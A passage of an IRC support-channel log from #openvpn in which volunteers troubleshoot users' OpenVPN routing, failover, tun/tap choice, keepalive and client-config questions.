22:27 < pekster> mongoman: Two unique clients connecting to the same server, or two unique connections both running on a single client? 22:28 < mongoman> the later. 22:29 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has quit [Quit: Leaving] 22:29 < mongoman> I have a server that suppose to act as a gateway for the other clients in the lan, the only way out of the lan is through that server. the server connects to 2 different vpn provider for redundancy. 22:30 < mongoman> The 2 connections are given a different metric and are set as the GW_Server 22:30 < mongoman> *The 2 connections are given a different metric and are set as the GW_Server's default route. 22:30 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Remote host closed the connection] 22:31 < mongoman> The problem I am having is sometime I start getting about 50% packet loss, while both connections seem up 22:31 < mongoman> Each connection is working well by itself. 22:31 < pekster> What's the goal when you say you're using them both "for redundancy"? 22:32 < pekster> You want to use them both at the same time? Or for hot-failover? 22:32 < mongoman> In case one of the connections stops working(no more money in the vpn account, or they changed the server), i could route the internet trafic through the other connection 22:32 < mongoman> only as a hot-failover. 22:33 < pekster> Only use one as a default gateway then routed to the live VPN peer, and switch it over if it's disconnected or perhaps fails a connectivity check you perform (ping the VPN peer endpoint, ping some external series of "known good" hosts like google.com or such) 22:33 < pekster> route* 22:33 < pekster> The --up and --down scripts are probably of use here too 22:36 < mongoman> It's a good idea, however i still don't understand why i am getting the 50% packet loss 22:36 < mongoman> both connections work fine by themselves 22:36 < pekster> Probably because both routes end up getting used and you're getting results that take asymettric paths 22:37 < mongoman> that might be the reason, however i have a different metric on both interfaces 22:37 < pekster> Don't use multiple gateways like that unless you're marking each traffic stream to keep it bound to the correct externally-facing interface 22:38 -!- NuclearMeltdown [~rep@AntiLiberal-1-pt.tunnel.tserv9.chi1.ipv6.he.net] has joined #openvpn 22:38 < pekster> The metric only matters if you're using an actual routing protocol daemon 22:38 -!- NuclearMeltdown [~rep@AntiLiberal-1-pt.tunnel.tserv9.chi1.ipv6.he.net] has quit [Changing host] 22:38 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has joined #openvpn 22:39 < mongoman> can you please elaborate on that? 22:39 < pekster> If you have not set up dynamic routing, then it's worthless, and the fact that you have multiple default gateways is causing the problem I described. Don't do that unless you're prepared to handle dynamic routing and the session-tracking that comes with it 22:40 < pekster> Keep session streams separated and route them separatly if you want to use "both" connections at once, traditionally done under Linux by use of the connmark set/match support and keying off that in your routing setup (I like using tc and rule matches by cloning the nfmark from the connmark, but there are other ways too.) 22:41 < pekster> If that sounds complicated, it is an advanced routing topic; the good news is you don't really want it from a "hot-failover" perspective. Just use a single default gateway and you have no need for dynamic routing 22:41 -!- Rassmasta [~Rassmasta@99.228.239.126] has quit [Quit: Leaving] 22:43 < pekster> If you're looking to split the traffic between uplinks based on definable rules, LARTC has some good materials. http://lartc.org/howto/lartc.rpdb.multiple-links.html 22:43 <@vpnHelper> Title: Routing for multiple uplinks/providers (at lartc.org) 22:43 < mongoman> So if i understand correctly, if I have 2 same static routes and a metric which is different, linux doesn't consider the metric when routeing the traffic? 22:43 < pekster> Start earlier in the LARTC guide if you're new to advanced routing concepts under Linux 22:45 < pekster> No, it doesn't do what you're expecting. http://osdir.com/ml/linux.network.routing/2002-11/msg00167.html 22:45 <@vpnHelper> Title: linux.network.routing - Re: does metric in route works? - msg#00167 - Recent Discussion OSDir.com (at osdir.com) 22:48 < mongoman> pekster, Thank you very much, I will look deeply into the info you gave me, thank you and have a good night. 22:49 < pekster> Sure thing. Based on your earlier stated goal of hot-failover, stop messing with multiple default gateways at once and just write some small scripts using the openvpn-provided --up and --down scripts, or design your own "detect if openvpn tunnel #1 is working" code to switch gateways if there's a problem 22:51 < mongoman> I will look into that, thanks. 23:00 -!- Rallias [~rallias@unaffiliated/gasseus] has joined #openvpn 23:01 < Rallias> Is it possible to have 2 tap VPN's share TAP0? 23:01 < pekster> Nope. If you really want the effect that would have, just bridge two unique tap adapters to a bridge 23:02 < pekster> You should use routing anyway unless you actually need to send Ethernet frames across your VPN 23:02 < pekster> !tunortap 23:02 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 23:02 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 23:02 < Rallias> problem with my setup... openvz doesn't support br0 in containers. 23:02 < pekster> Try a better virtualization solution? 23:02 < pekster> !openvz 23:02 <@vpnHelper> "openvz" is (#1) http://wiki.openvz.org/VPN_via_the_TUN/TAP_device to learn bout openvz specific stuff with regards to openvpn or (#2) It is usually less painful to switch to a host with better virtualization technology, eg Xen. 23:03 < Rallias> I'm not particularily in the mood to switch 1500 VPS's from openvz to xen. 23:04 < EugeneKay> What could possibly go wrong 23:04 < Rallias> EugeneKay, We run out of memory? 23:05 < pekster> OpenVZ is "efficient" at the expensive of not being true virtualization. It's effectively a glorified chroot with some extra features bolted on 23:05 < pekster> expense* 23:06 < EugeneKay> RAM is cheap 23:07 < Rallias> EugeneKay, I've got 608 gb of ram distributed across 20 servers and no funds to do anything cool. 23:07 < Rallias> We have 545.63 gb of guaranteed allocation, 1056.24 gb of burst allocation. 23:07 < Rallias> we don't have the capacity to switch to xen. 23:08 < Rallias> or kvm... altho we've got 10 kvm servers. 23:09 < Rallias> meh, I guess I have to do the openvpn branch office on a host node as opposed to a vps.. 23:10 < pekster> Did I miss the part where you indicated a tun/routed setup wasn't going to work? 23:10 < pekster> AFAIK that works fine in OpenVZ as long as the host has loaded and exposed the proper support to guests 23:11 < Rallias> because tun involves more openvpn links and more cpu usage. 23:11 < Rallias> with tap I can have a br1 on the host node and use that with 60 VPS's. 23:12 < Rallias> with tun I have to have 1 openvpn link per vps 23:12 < EugeneKay> Why are you doing a link per VPS 23:12 < EugeneKay> Learn to route 23:13 < Rallias> because otherwise I'd have to use about 36 more public-facing IP's. 23:14 < EugeneKay> For.... what? 23:14 < EugeneKay> Are you trying to 1:1 NAT over VPN or something silly? 23:14 < Rallias> no, I'm trying to expose 172.16 IP's to the VPS's with only equipment I own. 23:14 < EugeneKay> Ok, so do that 23:15 < Rallias> which is what I'm trying to do. 23:15 < EugeneKay> !route 23:15 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs 23:15 <@vpnHelper> behind the server or client 23:15 < Rallias> The only way to do that though with openvz without flooding the datacenter's arp tables with 172.16's (which they've said no to) is using veth 23:15 < EugeneKay> Oh, you don't have a private network. 23:15 < Rallias> no 23:16 < Rallias> well... per physical node... 23:16 < pekster> OpenVPN plays great in a subnet or point-to-point setup on Linux; no need to give anything a public IP unless it actually needs/has one 23:16 < pekster> (both of which are topology modes you can use with tun) 23:16 < pekster> !topology 23:16 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this. 23:17 < EugeneKay> In my colo I have a small on-link subnet(/29) with two machines connected to it, and then a larger(/26) one routed to a single IP, which I then expose to my vhosts etc on the back-end 23:17 < EugeneKay> I also have private subnets on that back-end 23:18 < EugeneKay> Total cost is an extra GbE on the gateway machine and a gigabit switch 23:18 -!- Rallias [~rallias@unaffiliated/gasseus] has left #openvpn ["Ok, whatever, I get that what I'm saying sounds absurd so I'm going to leave before I get into a shouting match."] 23:18 < pekster> Ragequits after you feed info that might help 23:18 < pekster> Fun times 23:18 < EugeneKay> Oh, he left? 23:18 < EugeneKay> Tardbucket. 23:19 < pekster> I have a feeling either your suggestion might have helped, or the realization that you don't need to eat a /30 in routed mode might have been the point of contention 23:20 < EugeneKay> There's not much money in the OpenVZ hosting market - it's an eternal race to the bottom. I'm guessing he wasn't the brightest sysadmin ;-) 23:21 -!- ploo [~lbz@c-71-196-252-82.hsd1.co.comcast.net] has left #openvpn [] 23:21 < pekster> You know your company is in trouble when you end up ragequitting a volunteer IRC support channel without getting what you want :P 23:22 < EugeneKay> Hehehe 23:26 -!- krphop_ [~krphop@74.82.160.100] has joined #openvpn 23:32 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has quit [Ping timeout: 248 seconds] 23:32 -!- C-S-B [~C-S-B@host86-171-238-234.range86-171.btcentralplus.com] has quit [Ping timeout: 248 seconds] 23:32 -!- C_S_B [~C-S-B@craigsblackie.broker.freenet6.net] has joined #openvpn 23:32 -!- C_S_B is now known as C-S-B --- Day changed Fri Mar 01 2013 00:09 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has quit [Ping timeout: 272 seconds] 00:22 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has joined #openvpn 00:30 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has quit [Ping timeout: 245 seconds] 00:32 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has joined #openvpn 00:37 -!- neilhwatson [~neilhwats@72.138.34.70] has quit [Ping timeout: 245 seconds] 00:47 -!- Visitorer [~Visitorer@unaffiliated/visitorer] has joined #openvpn 01:09 < Visitorer> This config : http://pastebin.com/ws59czK3 Server is on OS X.7, client on OS X.8, both have ports forwarded, both can see each other's iTunes library, but none can ping each other 01:09 < Visitorer> both have firewalls down 01:40 -!- mikkel [~mikkel@80.71.132.15] has joined #openvpn 01:51 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 02:01 -!- mongoman [~mongoman@200.46.98.147] has quit [Ping timeout: 245 seconds] 02:09 -!- mattock_afk is now known as mattock 02:15 -!- mongoman [~mongoman@200.46.98.147] has joined #openvpn 02:17 -!- brute11k [~brute@89.249.235.13] has quit [Read error: Connection reset by peer] 02:18 -!- Immatix [~Immatix@cpe-24-33-68-69.cinci.res.rr.com] has joined #openvpn 02:21 < Immatix> I have a layer 2 OpenVPN tunnel between two hosts, with tap interfaces on either end. On one end, the tap interface is bridged to a physical Ethernet interface and connected to a local network. On the other end, it's just a virtual tap interface. From the remote system, I can ping the address of the bridge, but yet I can't reach any of the hosts connected to the physical network. Am I missing something 02:21 < Immatix> obvious? 02:25 -!- mongoman [~mongoman@200.46.98.147] has quit [Ping timeout: 245 seconds] 02:26 -!- mongoman [~mongoman@200.46.98.147] has joined #openvpn 02:30 -!- simpelsimon [~smalessa@91-66-249-214-dynip.superkabel.de] has joined #openvpn 02:35 -!- odoacre [~antonio@64.235.48.199] has quit [Ping timeout: 248 seconds] 02:35 -!- odoacre [~antonio@64.235.48.199] has joined #openvpn 02:42 < Immatix> things seem to be getting dropped in the iptables FORWARD table of all places 02:44 -!- dpecka [~dpecka@193.165.171.107] has left #openvpn [] 02:46 < Immatix> iptables physdev module seems to be the solution 02:54 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has quit [Ping timeout: 245 seconds] 02:58 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Quit: ZNC - http://znc.in] 02:59 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 03:13 -!- zz_AsadH is now known as AsadH 03:20 -!- dazo_afk is now known as dazo 03:21 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 03:21 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 276 seconds] 03:28 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 03:35 -!- Immatix [~Immatix@cpe-24-33-68-69.cinci.res.rr.com] has quit [Quit: WeeChat 0.3.7] 03:37 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood] 03:46 -!- bamalam [bamalam@80.243.180.121] has joined #openvpn 03:48 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 04:02 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 04:06 < bamalam> why does openvpn supercede ident2 and give out a real username? 04:06 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has quit [Ping timeout: 255 seconds] 04:07 < bamalam> in debian/sid BTW 04:08 < bamalam> it did not in lenny, I missed squeeze 04:12 < bamalam> in.ident2[27639]: sent reply `bamalam' to query 38.229.70.20 (34595, 6667), uid = 1000 04:12 < bamalam> btw ident2 is launched _y for user configurable ident 04:12 < bamalam> *-y 04:13 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 04:14 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 260 seconds] 04:14 < bamalam> without openvpn connected and running, it send out whatever ident I choose 04:17 <@plaisthos> openvpn has nothing to do with indent 04:18 < bamalam> fair enough, why does it work as expected and configurd without openvpn? 04:18 < bamalam> i would have thought the same myself 04:29 <@plaisthos> no idea depends on your identd 04:36 -!- p3rror [~mezgani@41.250.238.203] has joined #openvpn 04:39 -!- simpelsimon [~smalessa@91-66-249-214-dynip.superkabel.de] has left #openvpn [] 04:44 -!- marksaitis [~marksaiti@81.101.81.114] has joined #openvpn 04:49 < Visitorer> This config : http://pastebin.com/ws59czK3 Server is on OS X.7, client on OS X.8, both have ports forwarded, both have firewalls down, both can see each other's iTunes library, but none can ping each other 04:50 < Visitorer> wait, I just realized that we may have been connected through hamachi, so maybe we wouldn't have seen each other's iTunes library 04:55 < Visitorer> I editted the pastebin to include logs 04:55 < kisom> Visitorer: Your paste is private. 04:55 < Visitorer> oh.. oops 04:56 < Visitorer> http://pastebin.com/7rvRbivz 04:56 < Visitorer> I didn't include the part of the log where the server starts though, should I include it? 04:57 < Visitorer> edited hte paste to include it 04:58 < kisom> ...did you edit the log? The time stamp goes backwards in time at some point. 04:58 < Visitorer> yeah it's weird but no I didn't edit it 04:58 < kisom> Row 55 for example. 04:59 < kisom> OK, you should tcpdump to see what's happening. 04:59 < kisom> Is either peer within china? 05:00 < Visitorer> nope 05:00 < Visitorer> will do.. I can't do that right now though since my friend is offline 05:00 < Visitorer> would it help if I changed the verbosity of the server? 05:00 < kisom> Ptobably. 05:01 < kisom> On the other hand 05:01 < kisom> I see a TLS: tls_process: killed expiring key 05:01 < Visitorer> hmmm... 05:01 -!- marksaitis [~marksaiti@81.101.81.114] has quit [Remote host closed the connection] 05:02 < kisom> Does the tunnel work for an hour or so? 05:03 < Visitorer> actually, yes. It seems to redo the same thing every hour 05:03 < kisom> Add a --keepalive to the server side and pull settings from the client. 05:04 < Visitorer> I'm not launching it from commandline, unfortunately 05:05 < kisom> So add it in the config. 05:05 < Visitorer> the server already has "keepalive 10 120", are you talking about something else? 05:05 < kisom> Oh yeah, sorry, I missed it 05:06 < kisom> I think the client side logs would be more describing. 05:09 < Visitorer> I will check with my friend "tomorrow" 05:14 < Rienzilla> hmm 05:14 < Rienzilla> can openvpn push a route with a non-default metric? 05:14 < Rienzilla> ah yes 05:14 < Rienzilla> it can :) 05:25 < kisom> Visitorer: You dont specify an IP address on the client side, btw. 05:25 < kisom> Visitorer: Neither do you pull options from the server 05:25 < kisom> I'm not 100% sure that the IP address needs to be pulled tho 05:25 < kisom> But having the pull option on the client side in generally a good idea imo 05:27 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn 05:27 < kisom> Visitorer: Read the --pull directive in the manual. It explains your issue. 05:31 -!- marksaitis [~marksaiti@81.101.81.114] has joined #openvpn 05:36 < Rienzilla> hmz 05:39 < Rienzilla> Ok. I have a number of mobile offices (trucks). They are connected to the internet using a small embedded box containing a 3g-device which acts as a router for the machines in the truck. The embedded box connects to an openvpn server (tun), and routes all traffic through the tunnel with redirect-gateway... 05:40 < Rienzilla> Now, the embedded box also has a wifi interface, which is supposed to supply connectivity at some places (where the 3g coverage is poor). I would like the packets to the vpn endpoint to go through the wifi interface as soon as it's up 05:41 -!- gitsu-sa [~gtu@unaffiliated/gitsu-sa] has joined #openvpn 05:41 < Rienzilla> usually I would do this by setting a high metric on the routes over the 3g, and add lower metric routes to the same destination over the wifi link as soon as it comes up 05:41 < gitsu-sa> hey :) in a small lan, what do you would use, tcp or upd? 05:41 < Rienzilla> gitsu-sa: for openvpn, if you can use udp, use udp 05:42 < gitsu-sa> Rienzilla: uhm? 05:42 < gitsu-sa> sure i can x_x 05:42 < Rienzilla> ok 05:42 < Rienzilla> use udp then :) 05:42 < EugeneKay> I remember a patch to make openvpn work over ICMP 05:42 < EugeneKay> That was a riot. 05:42 < gitsu-sa> w..why? D: 05:43 < Rienzilla> because sending tcp over tcp is bad 05:44 < Rienzilla> the protocols that are used on top of the vpn will take care of data loss etc when needed, so openvpn doesnt need to 05:44 < Rienzilla> ....but my question to the channel: can I make openvpn add routes with redirect-gateway, with a higher metric? 05:47 < gitsu-sa> Rienzilla: can I use upd for long distance connections too? 05:47 < gitsu-sa> on the other face of the world, for example 05:50 -!- gitsu-sa [~gtu@unaffiliated/gitsu-sa] has quit [Quit: leaving] 05:51 < kisom> And openvpn over TCP is currently broken, too ;) 05:51 < Rienzilla> .....yes? :) 05:53 -!- brute11k [~brute@89.249.235.13] has joined #openvpn 06:01 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 06:02 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 06:13 -!- ade_b [Ade@nat/redhat/x-tiojihvfdggsxoan] has joined #openvpn 06:13 -!- ade_b [Ade@nat/redhat/x-tiojihvfdggsxoan] has quit [Changing host] 06:13 -!- ade_b [Ade@redhat/adeb] has joined #openvpn 06:44 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 256 seconds] 06:45 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 06:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 264 seconds] 06:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:02 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Read error: Operation timed out] 07:07 -!- bamalam [bamalam@80.243.180.121] has quit [Ping timeout: 245 seconds] 07:15 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 07:16 -!- kyrix [~ashley@85.126.76.82] has joined #openvpn 07:31 < sejo> how can I know what name my client has (to put in ccd folder) 07:31 < sejo> is that the NAME of the csr or the cn? 07:42 < kisom> Its the cn 07:42 < kisom> It's all in the manual. 07:46 <@dazo> sejo: openssl x509 -noout -subject -in $CERTFILE 07:46 < sejo> thanks davo 07:47 < sejo> dazo 07:47 < sejo> now to figure out routing 07:47 < sejo> this is fun 07:47 <@dazo> !tcpip 07:47 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 07:59 -!- odoacre [~antonio@64.235.48.199] has quit [Read error: Connection reset by peer] 08:07 -!- brute11k [~brute@89.249.235.13] has quit [Read error: Connection reset by peer] 08:10 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 256 seconds] 08:12 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 08:14 -!- odoacre [~antonio@64.235.48.199] has joined #openvpn 08:17 -!- brute11k [~brute@89.249.235.13] has joined #openvpn 08:22 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 08:30 -!- speed_racer8 [~speed_rac@98.196.168.201] has quit [Ping timeout: 245 seconds] 08:36 -!- greyeax [~grey@cpe-108-185-215-179.socal.res.rr.com] has quit [Read error: Connection reset by peer] 08:37 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn 08:37 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host] 08:37 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 08:41 -!- odoacre_ [~antonio@222.126.240.10] has joined #openvpn 08:43 -!- speed_racer8 [~speed_rac@76.30.149.251] has joined #openvpn 08:45 -!- mikkel [~mikkel@80.71.132.15] has quit [Quit: Leaving] 08:45 -!- odoacre [~antonio@64.235.48.199] has quit [Ping timeout: 255 seconds] 08:46 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 255 seconds] 09:00 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 09:00 -!- failshell [~failshell@lpr157.lapresse.ca] has joined #openvpn 09:02 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 09:06 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 09:11 < failshell> hello, in a site-to-site setup, i keep getting that message every 5 minutes or so: Inactivity timeout (--ping-restart), restarting 09:11 < failshell> and the tunnels restarts 09:11 < failshell> how do i disable that? i want it to stay up at all times 09:11 < failshell> im using a pre-shared key 09:13 < Rienzilla> you can set a keepalive afaik 09:14 < Rienzilla> keepalive 5 30 09:14 < Rienzilla> in config 09:17 < failshell> on the server or client? 09:23 < Rienzilla> I don't thin kit matters 09:24 < rob0> If using a pre-shared key there is no server nor client. Set options you need in each peer's config. 09:24 < Rienzilla> as long as one of the nodes is sending a ping once in a while it's fine 09:24 < Rienzilla> but both is fine, too I think 09:24 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 09:27 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 09:28 < failshell> Authenticate/Decrypt packet error: bad packet ID (may be a replay): [ #593 / time = (1362151593) Fri Mar 1 10:26:33 2013 ] -- see the man page entry for --no-replay and --replay-window for more info or silence this warning with --mute-replay-warnings 09:28 < failshell> i get a lot of those too 09:28 < failshell> should i be worried? 09:35 < pekster> failshell: Did you see the notes in the manpage under the --replay-window option that discuss how to use verb 4 to see if you need to increase the replay window? 09:35 -!- ade_b [Ade@redhat/adeb] has quit [Ping timeout: 276 seconds] 09:35 < failshell> well yes, but since i dont really understand the implications 09:36 < failshell> im not sure what to do 09:36 < failshell> hence my questions :) 09:37 < pekster> Are you running at verb 4? Do you get any of the "Replay-window backtrack occurred" messages? 09:37 < failshell> i didnt see that message 09:38 < failshell> all i know, is that the tunnel keeps restarting 09:38 < pekster> Inactivity timeout is an unrelated issue to the bad packet ID 09:38 < pekster> You need to mirror your ping/ping-restart options between peers 09:39 < failshell> well, i added keepalive 5 30 on each side 09:39 < failshell> let me set ping/ping-restart 09:40 < pekster> keepalive is just a helper-directive that implies the ping/ping-restart options 09:41 < failshell> cant i just disable the restart instead? 09:41 < failshell> its a tunnel, it should not restart 09:41 < failshell> ever 09:41 < pekster> (It'll also push them if you use 'mode server' but that doesn't apply to a p2p mode) 09:41 < failshell> unless the connection is down 09:41 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 09:41 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Read error: Operation timed out] 09:43 < pekster> failshell: Right, the ping/ping-restart options are the only way to know if the tunnel is up or down. Otherwise it's just a PtP tunnel that doesn't do anything until it has data to send to the peer 09:43 < pekster> I should say the only way for OpenVPN specifically to know if the tunnel is up; you can always write code to do a ping test to the peer, but that's outside OpenVPN's realm 09:44 < failshell> its been a while since ive setup a tunnel, but as i recall, back in the days with IPsec tunnels, it didnt have that behavior 09:44 -!- Netsplit *.net <-> *.split quits: meepmeep, cosmicfires, mirco, kevinsky 09:45 < pekster> Keepalive packets serve another important role in keeping stateful firewalls open. For example, netfilter (which tracks state on Linux) defaults to a 3 minute timeout for UDP streams 09:45 -!- Netsplit over, joins: meepmeep 09:45 -!- Netsplit over, joins: mirco, kevinsky, cosmicfires 09:50 -!- mongoman [~mongoman@200.46.98.147] has quit [Ping timeout: 245 seconds] 09:59 < sejo> having 2 entries in the ccd one saying iroute 192.168.122.64 255.255.255.192 09:59 < sejo> and the other iroute 192.168.122.64 255.255.255.192 09:59 < sejo> and the other iroute 192.168.122.128 255.255.255.192 (sorry) 09:59 < sejo> shouldn't that result in routing entries like this: 192.168.122.64 192.168.101.2 255.255.255.192 UG 0 0 0 tun0 09:59 < sejo> 192.168.122.128 192.168.101.3 255.255.255.192 UG 0 0 0 tun0 10:00 < sejo> right now on the openvpn server both redirect to the 192.168.101.2 (wich should only receive the 192.168.122.64/26 range) 10:03 < pekster> sejo: iroute is an directive that tells openvpn to internally route traffic for the specified network to the client specified by the ccd file. You still need a normal 'route' statement in the server's config to get the route added to the OS-level routing table 10:03 < pekster> is a* 10:04 < sejo> pekster: I know, I've added those 10:04 < sejo> in the server.conf 10:04 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 10:04 < pekster> So, what's the issue. You asked if it results in system routing entries, and iroute does not; route is used for that instead. 10:06 < sejo> pekster: wait. push "route 192.168.122.0 255.255.255.0" will push the route to the clients 10:06 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:07 < sejo> route 192.168.122.64 255.255.255.192 will add it to the server 10:07 < pekster> Yup, although if you have iroutes for a /26 instead you should include the smaller routes, otherwise it'll also get pushed to the client owning the iroute. Normally openvpn will omit pushing a route to a client if it has a matching iroute 10:08 < sejo> ok so I should omit the route? 10:08 < pekster> If you want other clients to get a route, push it :) 10:10 < sejo> well basically the server should route to the correct machine, and on all nodes (and their vm's ) I should be able to concact others 10:10 -!- Kendall1 [~gjones@173-165-28-227-Illinois.hfc.comcastbusiness.net] has joined #openvpn 10:11 < pekster> Right. To do that you use iroute, route, and push "route ..." all at once 10:11 -!- Kendall1 is now known as Kendall 10:13 < sejo> indeed, but is it possible that the vm's ip's aren't learned by the openvpn (as they have no vpn client) so it's not routed by openvpn? 10:13 -!- JesseC [~JesseCWor@wsip-98-175-20-126.br.br.cox.net] has joined #openvpn 10:13 < sejo> I see the learned statements in my log for the nodes 10:15 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 10:16 < pekster> !clientlan 10:16 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 10:16 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 10:23 -!- NeoLobster [~NeoLobste@snugglenets.com] has left #openvpn [] 10:25 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 10:25 -!- mode/#openvpn [+o krzee] by ChanServ 10:27 < sejo> pekster: this is the config http://dpaste.com/1009042/ 10:29 < sejo> I can't figure it out :/ 10:30 < sejo> the forward is set in the firewall 10:30 < pekster> It's not overly wise to use both an ifconfig-pool directive (implied by your server directive on line 9) and ifconfig-push IPs inside that same pool. It "works" so long as you client requests a pool IP 10:31 < pekster> Otherwise that config is fine. (you do have a duplicate directive on lines 14/16) 10:32 < pekster> Actually, you need a different topology from the net30 default; you probably want 'topology subnet' instead 10:33 < sejo> removed the ippool, i'll change the topology 10:34 < pekster> I'm not talking about the ifconfig-pool-persist option; that does something else (and you don't need/want it anyway.) 10:34 < pekster> I'm talking about the implied use of --ifconfig-pool that is expanded from --server. See the latter directive in the manpage for expansion details 10:35 < pekster> Your implied pool range overlaps statically assigned IPs, which is going to break if you ever connect a client that pulls an address from your pool 10:35 < pekster> (I should say could break in specific conditions, fwiw) 10:36 < sejo> true, how do I set the topology? just add topology subnet? 10:38 <@krzee> !man 10:38 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 10:38 <@krzee> but yes 10:52 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:54 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 10:54 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:59 -!- raidz_away is now known as raidz 11:06 -!- marksaitis [~marksaiti@81.101.81.114] has quit [Ping timeout: 255 seconds] 11:07 -!- AsadH is now known as zz_AsadH 11:17 -!- speed_racer8 [~speed_rac@76.30.149.251] has quit [Read error: Connection reset by peer] 11:20 -!- MoPac [~MoPac@unaffiliated/mopac] has joined #openvpn 11:21 < MoPac> !welcome 11:21 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 11:21 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 11:23 < MoPac> I would like to store my client-side cert files in an encfs-encrypted folder in Linux. My problem: openvpn connection succeds when the key/cert files are, e.g., on my desktop. But it fails when they are in a (mounted) encfs folder. I'm not sure if this is a permissions issue, a problem of network manager talking to cryptkeeper, etc 11:24 < pekster> Fails how? OpenVPN doesn't care where your keys are so long as it can read the file at the path provided 11:31 <@krzee> could make it all in-line, then if you read in the config you're done 11:31 <@krzee> !inline 11:31 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the 